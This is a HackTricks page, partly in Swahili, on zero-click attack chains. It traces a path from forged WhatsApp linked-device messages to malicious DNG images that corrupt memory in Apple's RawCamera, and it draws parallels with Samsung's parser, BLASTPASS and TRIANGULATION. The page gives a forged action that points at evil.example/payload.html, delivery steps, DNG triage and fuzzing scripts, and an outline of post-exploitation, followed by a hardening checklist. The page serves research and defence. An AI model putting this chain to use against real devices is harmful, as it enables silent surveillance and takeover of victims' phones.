Zero-click Messaging → Image Parser Chains

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

TL;DR

  • Treat messaging app multi-device/companion protocols as remote control channels: if protocol fields are assumed to come from trusted devices, they might still be user-controlled and can often be replayed directly against a victim to load arbitrary content with 0 user interaction.
  • Once any app can be coerced into fetching untrusted media, target the shared OS media pipeline (RawCamera on iOS/macOS, vendor parsers on Android OEM builds) with malformed files to pivot out of the sandbox.
  • The DNG-based RawCamera and Samsung parser bugs discussed here are concrete examples, but the full technique is a reusable blueprint for chaining logic flaws → image parser memory corruption → full device compromise.

Remote content loading via WhatsApp linked-device commands

Attack surface recap

The WhatsApp “linked devices” architecture keeps the primary phone and every companion (desktop, tablet, secondary phone) in sync via encrypted, structured protocol messages. Each message encodes:

  • Device metadata (device ID, capabilities, feature flags).
  • Action descriptors (e.g., sync chats, fetch thumbnails, render remote content).
  • Arbitrary parameters such as URIs, MIME hints, pagination keys, etc.

On Apple clients, the handler that processes these linked-device control packets implicitly trusted that a valid pairing already occurred, so high-impact fields (e.g., resource_url, open_media, sync_snapshot) were only minimally validated. A malicious companion message could therefore:

  1. Be routed to any account identified by its phone number.
  2. Survive the transport stack (Noise protocol + WhatsApp protobuf framing) because the receiver never verified that the sender was a legitimately paired device.
  3. Reach the iOS client, where the vulnerable code path automatically triggered a background HTTP(S) request to the attacker URL and parsed the response in a hidden WebView/media renderer.

Practical workflow for auditors

  1. Capture legitimate linked-device traffic. Attach a debugger or Frida script to the desktop/iOS client and hook the post-decryption handler (e.g., LinkedDevicesSyncHandler::processAction). Dump decoded protobuf payloads to learn available action types and parameters.
  2. Identify fields that cross trust boundaries. Any action carrying http_url, thumbnail_uri, download_url, or render_html parameters without strict allow-lists is a candidate remote-content primitive.
  3. Forge a malicious action. Reuse the observed protobuf schema and modify only the attacker-controlled fields. A simplified JSON view of the relevant logical structure is shown below (the actual transport is protobuf/Noise, but the semantic fields match):
{
"op": "sync_action",
"device_id": "<attacker-companion>",
"payload": {
"target": "content_sync",
"resource_url": "https://evil.example/payload.html",
"media_type": "image/dng",
"flags": ["background_fetch", "render_inline"]
}
}
  1. Deliver to the victim. Rudisha pakiti iliyotengenezwa kupitia huduma ile ile ya WhatsApp inayowasilisha kwa kawaida trafiki ya linked-device (kwa mfano, ukitumia desktop client iliyorekebishwa au custom Noise client inayotumia tena funguo za akaunti ya mshambulizi). Kwa sababu CVE-2025-55177 haikufanikiwa kuhusisha vitendo na vifaa vilivyoidhinishwa, mteja wa iOS/macOS wa mhanga angenukuu ujumbe na mara moja kuchukua URL ya mshambulizi bila UI yoyote.
  2. Instrument the fetch. Fuatilia ombi lililolazimishwa la HTTP(S) na renderer wa ndani (WKWebView/ImageIO). Kwa hatua hii umepata primitive ya zero-click web delivery ndani ya WhatsApp.

Weaponizing auto-decoded DNGs against RawCamera

Once the attacker controls what WhatsApp loads, the next goal is to make iOS/macOS parse a malicious Digital Negative (DNG) file with the RawCamera framework. Any embedded <img>/CSS URL that resolves to a .dng will be passed to the system image pipeline, invoking RawCamera even if WhatsApp itself never handled DNGs explicitly.

Triggering RawCamera from WhatsApp

  • Serve HTML that references the DNG via multiple mechanisms (e.g., <img src="evil.dng">, CSS background-image: url('evil.dng'), or <picture> sources) to cover different render paths.
  • Ensure correct MIME (image/x-adobe-dng) and small previews so the loader does not bail early because of size heuristics.
  • The iOS media sandbox will stream the file into RawCamera via CGImageSourceCreateWithURL, eventually hitting the vulnerable decoder.

Crafting memory-corrupting DNGs (CVE-2025-43300 style)

The 2025 in-the-wild bug was more specific than a generic malformed TIFF: the DNG carried JPEG-Lossless image data whose internal SOF3 component count disagreed with the TIFF/DNG metadata (SamplesPerPixel). In practice, RawCamera could size some buffers from the outer TIFF fields and later trust the embedded JPEG-Lossless stream while decoding, yielding the out-of-bounds write fixed in iOS 18.6.2 / iPadOS 18.6.2 on August 20, 2025.

That gives auditors a much tighter triage rule than “mutate random tags”:

exiftool -s -SamplesPerPixel -BitsPerSample -Compression poc.dng
python3 - <<'PY'
from pathlib import Path
data = Path('poc.dng').read_bytes()
sof3 = data.index(b'\xff\xc3')
print('SOF3 components =', data[sof3 + 9])
PY

Ikiwa SamplesPerPixel na idadi ya vipengele ya SOF3 zinatofautiana, uko karibu sana na primitive halisi iliyojadiliwa hadharani kwa CVE-2025-43300. Vigezo vya karibu vya kawaida vinavyostahili fuzzing mara tu unapopata parsing path ni:

  • Tile/strip descriptors: Weka TileByteCounts/StripByteCounts kwa thamani za halisi lakini ongeza TileOffsets ili ziashirie maeneo nje ya buffer iliyotengwa.
  • Sub-IFD chains: Ingiza picha za sekondari zenye ImageWidth/ImageLength na BitsPerSample zinazokinzana, kwa hivyo RawCamera itahesabu buffer ndogo ilhali hatua za baadaye zinatumia vipimo vilivyodhibitiwa na mshambuliaji.
  • Opcode metadata: Badilisha vipengee vya OpcodeList3 ili usindikaji kwa kila safu ufanyike kwa viashiria vilivyoteuliwa na mshambuliaji.

A basic mutation harness to hunt for such corruptions can be built around macOS, since the same RawCamera code ships on macOS/iOS/iPadOS:

#!/bin/bash
set -e
for sample in corpus/*.dng; do
radamsa "$sample" > /tmp/poc.dng
/System/Library/CoreServices/RawCamera.bundle/Contents/MacOS/RawCamera /tmp/poc.dng >/tmp/out 2>&1 || {
mv /tmp/poc.dng crashes/$(date +%s).dng
}
done

Kila crash katika RawCamera inakupa primitive mpya. PoC iliyochapishwa ilifikia out-of-bounds read/write safi ya kutegemewa ya kutosha ku-crash WhatsApp kwenye iPhone, iPad, na Mac.

Building the 0-click chain

  1. Linked-device packet → inalazimisha WhatsApp kupakua https://evil.example/payload.html bila kugusa kifaa.
  2. Payload HTML → hutaja kimya evil.dng, ikihakikisha RawCamera inaitwa na media stack ya OS.
  3. Malicious DNG → inatumia crafted tags kusababisha RawCamera OOB na ku-crash/kumiliki image decoder.
  4. Post-corruption exploitation → ongeza info-leak gadgets (kwa mfano, kutumia vibaya predictable heap metadata) na pangia ROP/JOP chain kuvunja WhatsApp sandbox na kupata muktadha wenye vyeo zaidi.

Kwa sababu kila hatua ni ya moja kwa moja, mshambuliaji anahitaji nambari ya simu ya mwathiri pekee. Hakuna arifu, banner, au maombi yanaonyeshwa kwenye kifaa lengwa.

Recent Apple parser-chain patterns worth reusing

Chain hii ya WhatsApp → DNG → RawCamera inafuatilia muundo ule ule unaoonekana katika kampeni za hivi karibuni za zero-click za Apple: pata an alternate attachment wrapper inayofikia parser isiyo na vizuizi vingi, kisha tumiwa aina ya faili ambayo OS hu-preview kwa hamu.

  • BLASTPASS (September 7, 2023 / iOS 16.6.1): Citizen Lab iliripoti malicious PassKit attachments zenye picha, na Apple ilibatilisha Wallet (CVE-2023-41061) pamoja na ImageIO (CVE-2023-41064). Uchanganuzi wa baadaye wa Project Zero ulionyesha kwa nini hili ni muhimu kiutendaji: mshambuliaji hakuhitaji tu bug ya parser, bali pia kontena lililohamisha image parsing nje ya BlastDoor ya kawaida hadi mchakato tofauti. Wakati wa kukagua messaging apps, orodhesha kila aina ya attachment inayochochea background previews katika helper daemons (.pkpass, contact cards, sticker bundles, inline HTML, QuickLook previews), si tu attachments za picha zinazoonekana wazi.
  • TRIANGULATION (patched in iOS 15.7.8 on July 24, 2023, with the mainline fix already in iOS 16.3): Kaspersky ilionyesha kwamba malicious iMessage attachment iligusa undocumented Apple-only ADJUST TrueType instruction (CVE-2023-41990). Somo la vitendo ni kwamba fonti ni image-parser cousins kwa kazi za zero-click: rich-text previews, font fallback, na thumbnail generation yote yanaweza kuwa parser entry points hata app ikidai inasaidia tu “documents” au “stickers”.

Swali la ukaguzi linalojirudia basi ni: ni aina gani za ujumbe husababisha parsing kimya katika mchakato tofauti na chat renderer wazi? Hapo kawaida ndipo chain huwaanza. Kwa triage ya sampuli na ukaguzi wa muingiliano mara unapokuwa na faili yenye shaka, reuse this generic structural file-format detection page.

Samsung vendor image parser parallels

Bulletin ya Samsung kwa CVE-2025-21043 ilithibitisha kuwa stack yao proprietary ya image parsing (inayotumika na Gallery, Messages, na pia kwa njia isiyo ya moja kwa moja na WhatsApp) ilipata out-of-bounds write inayofikiwa kupitia media isiyotegemewa. Methodology ya exploitation inafanana na chain ya Apple:

  • Tambua auto-preview vector (chat thumbnails, notification previews, share sheets) ambayo inaparse faili ya mshambuliaji kwa kutumia maktaba za Samsung libimagecodec/libOneUI_ImageDecoder.
  • Linganisha updates za maktaba za OEM au fuzu parsers kwa faili za malformed RAW/DNG hadi utaona uharibifu wa kumbukumbu unaofanana na crash ya RawCamera (heap metadata clobber, register control, n.k.).
  • Wasilisha faili iliyotengenezwa kupitia chaneli yoyote ambayo tayari inaendesha auto-load ya maudhui (mfano, primitive ile ile ya linked-device, WhatsApp preview fetchers, au Android’s push-to-talk waveform previews).

Mara tu OOB write inaporomoka katika vendor parser, kuichanganya na primitive ya WhatsApp auto-fetch kunatoa chain nyingine ya zero-click kwenye vifaa vya Samsung.

Testing & hardening checklist

  • Protocol validation: Tekeleza allow-lists kali kwa kila kitendo cha linked-device. Companion commands zinazotaka fetch/render lazima zibaini pairing ya kifaa (kusaini payload) na URL iwe inakidhi allow-list au signed blob.
  • Transport replay countermeasures: Funga kila kitendo kwa per-device key na kata rejea packets zilizo na sender key isiyojulikana, hata kama sintaksia ya protobuf ni sahihi.
  • Media pipeline restrictions: Apps za ngazi ya juu zinapaswa kuruhusu tu MIME types zilizokubaliwa na kukataa wazi RAW/DNG isipokuwa kipengele kinahitajika.
  • Parser fuzzing regression tests: Weka corpora ya faili zilizoharibika za RAW/DNG na ziendeshe dhidi ya RawCamera/vendor decoders baada ya kila update.
  • Crash triage automation: Ambatisha DYLD_INSERT_LIBRARIES sanitizers au MTE kwenye fuzz devices ili kugundua hali ndogo za OOB kabla ya mashambulizi.

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks